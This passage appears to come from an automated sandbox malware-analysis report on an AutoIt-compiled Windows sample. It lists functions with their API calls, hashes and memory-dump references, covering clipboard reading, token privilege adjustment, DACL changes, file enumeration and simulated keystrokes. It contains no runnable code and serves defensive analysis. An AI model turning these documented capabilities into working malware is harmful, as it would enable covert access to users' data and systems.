                                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                                • Opcode ID: 643a34821172ecb47d2cc5052f949c75933cd6037ec3c1d8d7bb0039659f86a7
                                                                                                                                • Instruction ID: f07173f6ab45c7b70342614f6db025cb5192c4fc97cf067c29f92147da25439b
                                                                                                                                • Opcode Fuzzy Hash: 643a34821172ecb47d2cc5052f949c75933cd6037ec3c1d8d7bb0039659f86a7
                                                                                                                                • Instruction Fuzzy Hash: F5315672A4031CBBEB216B719C49FBF7E6CEB44B50F214026FA05EA1D1D6B05D41BBA1
                                                                                                                                Function 00F1BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00FD22E8,?,00000000,?,00F13E2E,?,00000000,?,00FADBF0,00000000,?), ref: 00F1BE8B
                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00F13E2E,?,00000000,?,00FADBF0,00000000,?,00000002), ref: 00F1BEA7
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F1BF19
                                                                                                                                  • Part of subcall function 00F3297D: __wsplitpath_helper.LIBCMT ref: 00F329BD
                                                                                                                                • _wcscpy.LIBCMT ref: 00F1BF31
                                                                                                                                • _wcscat.LIBCMT ref: 00F1BF46
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F1BF56
                                                                                                                                • _wcscpy.LIBCMT ref: 00F1C03E
                                                                                                                                • _wcscpy.LIBCMT ref: 00F1C1ED
                                                                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 00F1C250
                                                                                                                                  • Part of subcall function 00F3010A: std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                  • Part of subcall function 00F3010A: __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                  • Part of subcall function 00F1C320: _memmove.LIBCMT ref: 00F1C419
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                                                                                                                • API String ID: 2542276039-689609797
                                                                                                                                • Opcode ID: 73913ea7bdcae5025c6f8a82216c37abd76f12721876de3f42e662ce3d186a83
                                                                                                                                • Instruction ID: 0cfbb58d327143a9487e186b50b6f336fbd1308a46ab3976a78decfd1144297a
                                                                                                                                • Opcode Fuzzy Hash: 73913ea7bdcae5025c6f8a82216c37abd76f12721876de3f42e662ce3d186a83
                                                                                                                                • Instruction Fuzzy Hash: E7429E715083459FD710EF60C851BEBB7E8AF84310F04492DF98697252EB35EA89EB93
                                                                                                                                Function 00F67099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • OpenClipboard.USER32(00FADBF0), ref: 00F670C3
                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F670D1
                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00F670D9
                                                                                                                                • CloseClipboard.USER32 ref: 00F670E5
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00F67101
                                                                                                                                • CloseClipboard.USER32 ref: 00F6710B
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00F67120
                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00F6712D
                                                                                                                                • GetClipboardData.USER32(00000001), ref: 00F67135
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00F67142
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00F67176
                                                                                                                                • CloseClipboard.USER32 ref: 00F67283
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3222323430-0
                                                                                                                                • Opcode ID: ae27cf606062fae1e9d4f8d9d2ad6af3dc1d63624f1c9667077aa4529eea17bb
                                                                                                                                • Instruction ID: dd6598f1bb3d4c48175d9d2259d938913f0775ab87382ae92d435904c6732bd9
                                                                                                                                • Opcode Fuzzy Hash: ae27cf606062fae1e9d4f8d9d2ad6af3dc1d63624f1c9667077aa4529eea17bb
                                                                                                                                • Instruction Fuzzy Hash: CD51BE31208309ABD311FF74DC9AF6E77A8AF88B11F10052AF546D61E1EF64D944BB62
                                                                                                                                Function 00F4B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F4BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F4BF0F
                                                                                                                                  • Part of subcall function 00F4BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F4BF3C
                                                                                                                                  • Part of subcall function 00F4BEC3: GetLastError.KERNEL32 ref: 00F4BF49
                                                                                                                                • _memset.LIBCMT ref: 00F4BA34
                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F4BA86
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00F4BA97
                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F4BAAE
                                                                                                                                • GetProcessWindowStation.USER32 ref: 00F4BAC7
                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 00F4BAD1
                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F4BAEB
                                                                                                                                  • Part of subcall function 00F4B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F4B9EC), ref: 00F4B8C5
                                                                                                                                  • Part of subcall function 00F4B8B0: CloseHandle.KERNEL32(?,?,00F4B9EC), ref: 00F4B8D7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                • String ID: $default$winsta0
                                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                                • Opcode ID: 4334da3ea7261160c2c019407c20062465fdcca04ff676360af7831ce6c5468e
                                                                                                                                • Instruction ID: 45f86fdce34930c5017222f746416ed8d78c1b023bf7334247193a8ecfbfa0ee
                                                                                                                                • Opcode Fuzzy Hash: 4334da3ea7261160c2c019407c20062465fdcca04ff676360af7831ce6c5468e
                                                                                                                                • Instruction Fuzzy Hash: 65813971C0020DAFDF159FE4DD85AEEBBB9EF08314F14451AFD14A6262DB35CA15AB20
                                                                                                                                Function 00F62044 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F62065
                                                                                                                                • _wcscmp.LIBCMT ref: 00F6207A
                                                                                                                                • _wcscmp.LIBCMT ref: 00F62091
                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00F620A3
                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00F620D5
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F620E0
                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00F620FC
                                                                                                                                • _wcscmp.LIBCMT ref: 00F62123
                                                                                                                                • _wcscmp.LIBCMT ref: 00F6213A
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F6214C
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00FC3A68), ref: 00F6216A
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F62174
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F62181
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F62191
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Attributes
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 70642500-438819550
                                                                                                                                • Opcode ID: 263f158d2a462391e66eb79d06c78209d5f469e46f7f86e13681e046dd4818ed
                                                                                                                                • Instruction ID: dbcd28f3f350ac94708d36692b9421be349d04b021d4d76c6f7c6dfc405235a6
                                                                                                                                • Opcode Fuzzy Hash: 263f158d2a462391e66eb79d06c78209d5f469e46f7f86e13681e046dd4818ed
                                                                                                                                • Instruction Fuzzy Hash: BA31E232A0461D7EDB54EBA4DC49EDE73BCAF06360F104156F911E3090DB78DA84EA61
                                                                                                                                Function 00F7F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00F7F14B
                                                                                                                                  • Part of subcall function 00F7D5EE: ClientToScreen.USER32(?,?), ref: 00F7D617
                                                                                                                                  • Part of subcall function 00F7D5EE: GetWindowRect.USER32(?,?), ref: 00F7D68D
                                                                                                                                  • Part of subcall function 00F7D5EE: PtInRect.USER32(?,?,00F7EB2C), ref: 00F7D69D
                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00F7F1B4
                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F7F1BF
                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F7F1E2
                                                                                                                                • _wcscat.LIBCMT ref: 00F7F212
                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F7F229
                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00F7F242
                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00F7F259
                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00F7F27B
                                                                                                                                • DragFinish.SHELL32(?), ref: 00F7F282
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F7F36D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                • API String ID: 2166380349-3440237614
                                                                                                                                • Opcode ID: a505763ffccea550f4267df30560fa86ce17799d6b266a02d5335a8cc4cf6ea8
                                                                                                                                • Instruction ID: b370f2e4448ba9b44d7fc2e72f30b449f2819e3fc7ccc8a3e162437f8005c8b9
                                                                                                                                • Opcode Fuzzy Hash: a505763ffccea550f4267df30560fa86ce17799d6b266a02d5335a8cc4cf6ea8
                                                                                                                                • Instruction Fuzzy Hash: 81618A72508304AFC301EF64DC85E9BBBF8FF88710F104A1EF695921A1DB349A49EB52
                                                                                                                                Function 00F6219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F621C0
                                                                                                                                • _wcscmp.LIBCMT ref: 00F621D5
                                                                                                                                • _wcscmp.LIBCMT ref: 00F621EC
                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00F6221B
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F62226
                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00F62242
                                                                                                                                • _wcscmp.LIBCMT ref: 00F62269
                                                                                                                                • _wcscmp.LIBCMT ref: 00F62280
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F62292
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00FC3A68), ref: 00F622B0
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F622BA
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F622C7
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F622D7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File_wcscmp$Close$CurrentDirectoryFirstNext
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 4190467141-438819550
                                                                                                                                • Opcode ID: cecb918dfc2d1a8c2c6d3d9b93140c7031fa5cafcdc19323ca4b994553cae71f
                                                                                                                                • Instruction ID: a07bdff26643cd04d52a60fd5a1230d663bb44777d225dfe4ab2055a84ce095c
                                                                                                                                • Opcode Fuzzy Hash: cecb918dfc2d1a8c2c6d3d9b93140c7031fa5cafcdc19323ca4b994553cae71f
                                                                                                                                • Instruction Fuzzy Hash: EA310632A0161E6AEF54EFA8DC59EDE77BCAF05335F204156E810A3090DB34DE85EA64
                                                                                                                                Function 00F16BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove_memset
                                                                                                                                • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                • API String ID: 3555123492-286096704
                                                                                                                                • Opcode ID: e1806cf073bc4fe7ee5fea923e2f160ba04cabdf2048915da676fb45a9e15abd
                                                                                                                                • Instruction ID: 70a0aa97f3c4ae1a612418a6485ce1dbeb4d9afcc3111e8ac655a64fc322d442
                                                                                                                                • Opcode Fuzzy Hash: e1806cf073bc4fe7ee5fea923e2f160ba04cabdf2048915da676fb45a9e15abd
                                                                                                                                • Instruction Fuzzy Hash: B8728B72D042199FDF24CF98C8907EDB7B1FF44324F2481A9D859AB291D735AE81EB90
                                                                                                                                Function 00F7ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F7ED0C
                                                                                                                                • GetFocus.USER32 ref: 00F7ED1C
                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00F7ED27
                                                                                                                                • _memset.LIBCMT ref: 00F7EE52
                                                                                                                                • GetMenuItemInfoW.USER32 ref: 00F7EE7D
                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00F7EE9D
                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00F7EEB0
                                                                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F7EEE4
                                                                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F7EF2C
                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F7EF64
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F7EF99
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 3616455698-4108050209
                                                                                                                                • Opcode ID: 510f01246d046e3236930f7b94dc172fdaec6b217aa251a6bba072d4d0b86001
                                                                                                                                • Instruction ID: de7ad062e6c6eeae08e8c865a7ec9b498b3d8a08c5718ae4a257fe2cada642aa
                                                                                                                                • Opcode Fuzzy Hash: 510f01246d046e3236930f7b94dc172fdaec6b217aa251a6bba072d4d0b86001
                                                                                                                                • Instruction Fuzzy Hash: 90819C71608305AFD720DF14C884AAABBE9FB8C364F14896FF99897291D730D905EB53
                                                                                                                                Function 00F4B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F4B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F4B903
                                                                                                                                  • Part of subcall function 00F4B8E7: GetLastError.KERNEL32(?,00F4B3CB,?,?,?), ref: 00F4B90D
                                                                                                                                  • Part of subcall function 00F4B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00F4B3CB,?,?,?), ref: 00F4B91C
                                                                                                                                  • Part of subcall function 00F4B8E7: RtlAllocateHeap.NTDLL(00000000,?,00F4B3CB), ref: 00F4B923
                                                                                                                                  • Part of subcall function 00F4B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F4B93A
                                                                                                                                  • Part of subcall function 00F4B982: GetProcessHeap.KERNEL32(00000008,00F4B3E1,00000000,00000000,?,00F4B3E1,?), ref: 00F4B98E
                                                                                                                                  • Part of subcall function 00F4B982: RtlAllocateHeap.NTDLL(00000000,?,00F4B3E1), ref: 00F4B995
                                                                                                                                  • Part of subcall function 00F4B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F4B3E1,?), ref: 00F4B9A6
                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F4B3FC
                                                                                                                                • _memset.LIBCMT ref: 00F4B411
                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F4B430
                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00F4B441
                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00F4B47E
                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F4B49A
                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00F4B4B7
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F4B4C6
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00F4B4CD
                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F4B4EE
                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00F4B4F5
                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F4B526
                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F4B54C
                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F4B560
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2347767575-0
                                                                                                                                • Opcode ID: 14c005ab703654d45803452ca06749431fbae6143f014f88b9cd71ea5d790df9
                                                                                                                                • Instruction ID: f2cf36bfc01ce38d7643eb379219049b27f54817fd8dcc62f1e8106e9ff2ba57
                                                                                                                                • Opcode Fuzzy Hash: 14c005ab703654d45803452ca06749431fbae6143f014f88b9cd71ea5d790df9
                                                                                                                                • Instruction Fuzzy Hash: 37512971900209ABDF04DFA5DC45AEEBB79FF04310F14812AE915A72A6DB35DA05EB60
                                                                                                                                Function 00F56B3F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164filestringCOMMON
